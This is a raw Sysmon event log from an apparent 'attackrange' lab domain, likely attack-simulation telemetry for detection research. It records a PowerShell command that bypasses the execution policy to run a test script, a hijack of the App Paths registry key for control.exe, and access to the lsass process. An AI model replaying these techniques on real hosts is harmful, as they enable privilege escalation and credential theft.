07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.635{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.635{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.623{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397769639B96763842D2AFA12938822B,SHA256=1C7F09667B19CEDEB6D009E524A88773E5C988576DC0434EBA2CE67971423726,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:37.266{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:40.899{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8F410F893F0E57CE50A00F39C1D189F,SHA256=350A9D21C7F0F8D06194E46F0B037ECEBACED862EDB16922DBB143B0E49D472E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:57:40.641{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 23542300x80000000000000001051231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBA7883246AC61F6D7295D34998F7D07,SHA256=30AA5FE32C2CD21B9BDD15F39C69CE8ED122340156963215DFB535027A087624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.638{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02A6AA0B17411923BA705BC9356AAB43,SHA256=9095CCBE957F229AE972F7EE0803BC8C1DEFD2B2A3055548A5C86F6AB8142526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437C389DAB0ED295191BA185CDA12F5C,SHA256=8717EFEAD7831EEEB83BD1F6916C3A0F805ABC97858BB2379E5E272509958E33,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.268{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.268{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001051226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:40.236{466BC892-F5F3-60EB-877D-00000000CF01}9944\PSHost.132705502596233024.9944.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.221{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_uj1yo4yo.ahl.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051224Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.221{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_evjoeowr.bq1.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.205{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_evjoeowr.bq1.ps12021-07-12 07:57:40.205 10341000x80000000000000001051222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}994410116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.152{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf6e3f3e.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.121{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.052{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:40.052{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:41.993{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B60283172CE39E3D61E9DE18878ECA06,SHA256=331E797C1697207CF78853E7D5FB465B540AA3959A4F4043EA7B791B6476CC4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:41.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9DB098156DF7EA9B25D8F873B08390E,SHA256=DC0CFED7A60C0BF50D26E966714AD0662272E89A8C1296C22F0F841CFD1D224B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51101-false10.0.1.12-8000- 23542300x80000000000000001051233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:41.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7516D07F9E51676DB4F3C62069F5A8B9,SHA256=A85D5D476891556241C51841B1F3CFBC0C00E8E523A99256A7FBF1F0A0005A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:42.154{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FE321FA6559E557E02044F0801D9640,SHA256=6BF0E7133B50B83F9877A02BA5F091BBBC05B21D09130D2793546840C4F1FEE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.781{466BC892-F5F3-60EB-877D-00000000CF01}9944ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001051238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 07:57:43.762{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe 23542300x80000000000000001051237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:43.172{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E20CE5D822D68C22C050B569242045C0,SHA256=03227565C39D9A17B340EA6F682BDA51E6231EAE429246840B6A899C3E6A3EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:43.024{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 